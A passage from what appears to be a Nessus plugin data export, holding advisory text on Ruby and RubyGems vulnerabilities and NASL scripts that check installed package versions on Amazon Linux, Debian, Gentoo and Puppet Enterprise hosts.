script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-debuginfo-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-devel-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-doc-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-irb-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"ruby21-libs-2.1.6-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-bigdecimal-1.2.4-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygem21-io-console-0.4.3-1.17.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"rubygem21-psych-2.0.5-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems21-2.2.3-1.17.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"rubygems21-devel-2.2.3-1.17.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby21 / ruby21-debuginfo / ruby21-devel / ruby21-doc / ruby21-irb / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:14:28", "description": "Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method.\nAttacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\nRubyGems contains a Directory Traversal vulnerability in install_location function of package.rb that can result in path traversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\nRubyGems contains a Deserialization of Untrusted Data vulnerability in owner command that can result in code execution. This attack appear to be exploitable via victim must run the `gem owner` command on a gem with a specially crafted YAML file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-08-29T00:00:00", "type": "nessus", "title": "Debian DLA-1480-1 : ruby2.1 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1-dev", "p-cpe:/a:debian:debian_linux:ruby2.1-doc", "p-cpe:/a:debian:debian_linux:ruby2.1-tcltk", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1480.NASL", "href": "https://www.tenable.com/plugins/nessus/112167", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1480-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112167);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2337\", \"CVE-2018-1000073\", \"CVE-2018-1000074\");\n\n script_name(english:\"Debian DLA-1480-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class method.\nAttacker passing different type of object than String as 'retval'\nargument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\nRubyGems contains a Directory Traversal vulnerability 
in\ninstall_location function of package.rb that can result in path\ntraversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\nRubyGems contains a Deserialization of Untrusted Data vulnerability in\nowner command that can result in code execution. This attack appear to\nbe exploitable via victim must run the `gem owner` command on a gem\nwith a specially crafted YAML file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2018/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u5\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:14", "description": "According to its self-reported version number, the Puppet Enterprise application running on the remote host is version 3.7.x or 3.8.x prior to 3.8.1. It is, therefore, affected by the following vulnerabilities :\n\n - A flaw exists in RubyGems due to a failure to validate hostnames when fetching gems or making API requests. 
A remote attacker, using a crafted DNS SRV record, can exploit this to redirect requests to arbitrary domains.\n (CVE-2015-3900)\n\n - A flaw exists in RubyGems due to a failure to sanitize DNS responses, which allows a man-in-the-middle attacker to install arbitrary applications. (CVE-2015-4020)\n\n - A flaw exists in Puppet Enterprise related to how certificates are managed, under certain vulnerable configurations, which allows a trusted certificate to be used to perform full certificate management. An attacker can exploit this flaw to revoke the certificates of other nodes or to approve their certificate requests.\n (CVE-2015-4100)\n\nNote that the default 'monolithic', 'split', and 'multimaster' installations of Puppet Enterprise are not affected by CVE-2015-4100.", "cvss3": {}, "published": "2015-07-23T00:00:00", "type": "nessus", "title": "Puppet Enterprise 3.7.x < 3.8.1 / 3.8.x < 3.8.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020", "CVE-2015-4100"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:puppetlabs:puppet"], "id": "PUPPET_ENTERPRISE_CVE_2015-4100.NASL", "href": "https://www.tenable.com/plugins/nessus/84961", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84961);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-3900\", \"CVE-2015-4020\", \"CVE-2015-4100\");\n script_bugtraq_id(75431, 75482);\n\n script_name(english:\"Puppet Enterprise 3.7.x < 3.8.1 / 3.8.x < 3.8.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Puppet Enterprise version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"According to its self-reported version number, the Puppet Enterprise\napplication running on the remote host is version 3.7.x or 3.8.x\nprior to 3.8.1. It is, therefore, affected by the following\nvulnerabilities :\n\n - A flaw exists in RubyGems due to a failure to validate\n hostnames when fetching gems or making API requests. A\n remote attacker, using a crafted DNS SRV record, can\n exploit this to redirect requests to arbitrary domains.\n (CVE-2015-3900)\n\n - A flaw exists in RubyGems due to a failure to sanitize\n DNS responses, which allows a man-in-the-middle attacker\n to install arbitrary applications. (CVE-2015-4020)\n\n - A flaw exists in Puppet Enterprise related to how\n certificates are managed, under certain vulnerable\n configurations, which allows a trusted certificate to be\n used to perform full certificate management. An attacker\n can exploit this flaw to revoke the certificates of\n other nodes or to approve their certificate requests.\n (CVE-2015-4100)\n\nNote that the default 'monolithic', 'split', and 'multimaster'\ninstallations of Puppet Enterprise are not affected by CVE-2015-4100.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://puppet.com/security/cve/CVE-2015-4100\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.rubygems.org/2015/05/14/CVE-2015-3900.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://groups.google.com/forum/#!topic/puppet-announce/mnV70g2PttQ\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Puppet Enterprise 3.8.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3900\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:puppetlabs:puppet\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"puppet_rest_detect.nasl\");\n script_require_keys(\"puppet/rest_port\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\napp_name = \"Puppet Enterprise\";\n\nport = get_kb_item_or_exit('puppet/rest_port');\nver = get_kb_item_or_exit('puppet/' + port + '/version');\n\nif ('Enterprise' >< ver)\n{\n # convert something like\n # 2.7.19 (Puppet Enterprise 2.7.0)\n # to\n # 2.7.0\n match = eregmatch(string:ver, pattern:\"Enterprise ([0-9.]+)\\)\");\n if (isnull(match)) audit(AUDIT_UNKNOWN_WEB_APP_VER, app_name, build_url(port:port));\n ver = match[1];\n}\nelse audit(AUDIT_WEB_APP_NOT_INST, app_name, port);\n\nif (\n ver =~ \"^3\\.7($|[^0-9])\" ||\n ver =~ \"^3\\.8\\.0($|[^0-9])\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : Puppet Enterprise ' + ver +\n '\\n Fixed version : Puppet Enterprise 3.8.1\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, build_url(port:port), ver);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:20", "description": "The remote host is affected by the vulnerability described in GLSA-201710-18 (Ruby: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been 
discovered in Ruby. Please review the referenced CVE identifiers for details.\n Impact :\n\n A remote attacker could execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2017-10-18T00:00:00", "type": "nessus", "title": "GLSA-201710-18 : Ruby: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2017-0898", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ruby", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201710-18.NASL", "href": "https://www.tenable.com/plugins/nessus/103911", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201710-18.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103911);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2337\", \"CVE-2017-0898\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"GLSA\", value:\"201710-18\");\n\n script_name(english:\"GLSA-201710-18 : Ruby: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201710-18\n(Ruby: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Ruby. Please review the\n referenced CVE identifiers for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, cause a Denial of\n Service condition, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201710-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Ruby users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/ruby-2.2.8'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-lang/ruby\", unaffected:make_list(\"ge 2.2.8\"), vulnerable:make_list(\"lt 2.2.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:22:10", "description": "Multiple vulnerabilities were found in the interpreter for the Ruby language. 
The Common Vulnerabilities and Exposures project identifies the following issues :\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO or MAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the OpenSSL extension.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\nDoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\ngem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\nRubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\nMax Justicz reported that RubyGems is prone to an unsafe object deserialization vulnerability. When parsed by an application which processes gems, a specially crafted YAML formatted gem specification can lead to remote code execution.\n\nCVE-2017-10784\n\nYusuke Endoh discovered an escape sequence injection vulnerability in the Basic authentication of WEBrick. An attacker can take advantage of this flaw to inject malicious escape sequences to the WEBrick log and potentially execute control characters on the victim's terminal emulator when reading logs.\n\nCVE-2017-14033\n\nasac reported a buffer underrun vulnerability in the OpenSSL extension. A remote attacker could take advantage of this flaw to cause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\nHeap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\nA command injection vulnerability in Net::FTP might allow a malicious FTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\nAaron Patterson reported that WEBrick bundled with Ruby was vulnerable to an HTTP response splitting vulnerability. 
It was possible for an attacker to inject fake HTTP responses if a script accepted an external input and output it without modifications.\n\nCVE-2017-17790\n\nA command injection vulnerability in lib/resolv.rb's lazy_initialze might allow a command injection attack. However untrusted input to this function is rather unlikely.\n\nCVE-2018-6914\n\nooooooo_q discovered a directory traversal vulnerability in the Dir.mktmpdir method in the tmpdir library. It made it possible for attackers to create arbitrary directories or files via a .. (dot dot) in the prefix argument.\n\nCVE-2018-8777\n\nEric Wong reported an out-of-memory DoS vulnerability related to a large request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\naerodudrizzt found a buffer under-read vulnerability in the Ruby String#unpack method. If a big number was passed with the specifier @, the number was treated as a negative value, and an out-of-buffer read occurred. Attackers could read data on heaps if a script accepts an external input as the argument of String#unpack.\n\nCVE-2018-8779\n\nooooooo_q reported that the UNIXServer.open and UNIXSocket.open methods of the socket library bundled with Ruby did not check for NUL bytes in the path argument. The lack of check made the methods vulnerable to unintentional socket creation and unintentional socket access.\n\nCVE-2018-8780\n\nooooooo_q discovered an unintentional directory traversal in some methods in Dir, by the lack of checking for NUL bytes in their parameter.\n\nCVE-2018-1000075\n\nA negative size vulnerability in ruby gem package tar header that could cause an infinite loop.\n\nCVE-2018-1000076\n\nRubyGems package improperly verifies cryptographic signatures. 
A mis-signed gem could be installed if the tarball contains multiple gem signatures.\n\nCVE-2018-1000077\n\nAn improper input validation vulnerability in RubyGems specification homepage attribute could allow malicious gem to set an invalid homepage URL.\n\nCVE-2018-1000078\n\nCross Site Scripting (XSS) vulnerability in gem server display of homepage attribute.\n\nCVE-2018-1000079\n\nPath Traversal vulnerability during gem installation.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-07-16T00:00:00", "type": "nessus", "title": "Debian DLA-1421-1 : ruby2.1 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1-dev", "p-cpe:/a:debian:debian_linux:ruby2.1-doc", "p-cpe:/a:debian:debian_linux:ruby2.1-tcltk", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1421.NASL", "href": "https://www.tenable.com/plugins/nessus/111081", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian 
Security Advisory DLA-1421-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111081);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-9096\", \"CVE-2016-2339\", \"CVE-2016-7798\", \"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17742\", \"CVE-2017-17790\", \"CVE-2018-1000075\", \"CVE-2018-1000076\", \"CVE-2018-1000077\", \"CVE-2018-1000078\", \"CVE-2018-1000079\", \"CVE-2018-6914\", \"CVE-2018-8777\", \"CVE-2018-8778\", \"CVE-2018-8779\", \"CVE-2018-8780\");\n\n script_name(english:\"Debian DLA-1421-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. 
The Common Vulnerabilities and Exposures project identifies\nthe following issues :\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO or\nMAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the\nOpenSSL extension.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\nDoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\ngem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\nRubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\nMax Justicz reported that RubyGems is prone to an unsafe object\ndeserialization vulnerability. When parsed by an application which\nprocesses gems, a specially crafted YAML formatted gem specification\ncan lead to remote code execution.\n\nCVE-2017-10784\n\nYusuke Endoh discovered an escape sequence injection vulnerability in\nthe Basic authentication of WEBrick. An attacker can take advantage of\nthis flaw to inject malicious escape sequences to the WEBrick log and\npotentially execute control characters on the victim's terminal\nemulator when reading logs.\n\nCVE-2017-14033\n\nasac reported a buffer underrun vulnerability in the OpenSSL\nextension. A remote attacker could take advantage of this flaw to\ncause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\nHeap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\nA command injection vulnerability in Net::FTP might allow a malicious\nFTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\nAaron Patterson reported that WEBrick bundled with Ruby was vulnerable\nto an HTTP response splitting vulnerability. 
It was possible for an\nattacker to inject fake HTTP responses if a script accepted an\nexternal input and output it without modifications.\n\nCVE-2017-17790\n\nA command injection vulnerability in lib/resolv.rb's lazy_initialze\nmight allow a command injection attack. However untrusted input to\nthis function is rather unlikely.\n\nCVE-2018-6914\n\nooooooo_q discovered a directory traversal vulnerability in the\nDir.mktmpdir method in the tmpdir library. It made it possible for\nattackers to create arbitrary directories or files via a .. (dot dot)\nin the prefix argument.\n\nCVE-2018-8777\n\nEric Wong reported an out-of-memory DoS vulnerability related to a\nlarge request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\naerodudrizzt found a buffer under-read vulnerability in the Ruby\nString#unpack method. If a big number was passed with the specifier @,\nthe number was treated as a negative value, and an out-of-buffer read\noccurred. Attackers could read data on heaps if a script accepts an\nexternal input as the argument of String#unpack.\n\nCVE-2018-8779\n\nooooooo_q reported that the UNIXServer.open and UNIXSocket.open\nmethods of the socket library bundled with Ruby did not check for NUL\nbytes in the path argument. The lack of check made the methods\nvulnerable to unintentional socket creation and unintentional socket\naccess.\n\nCVE-2018-8780\n\nooooooo_q discovered an unintentional directory traversal in some\nmethods in Dir, by the lack of checking for NUL bytes in their\nparameter.\n\nCVE-2018-1000075\n\nA negative size vulnerability in ruby gem package tar header that\ncould cause an infinite loop.\n\nCVE-2018-1000076\n\nRubyGems package improperly verifies cryptographic signatures. 
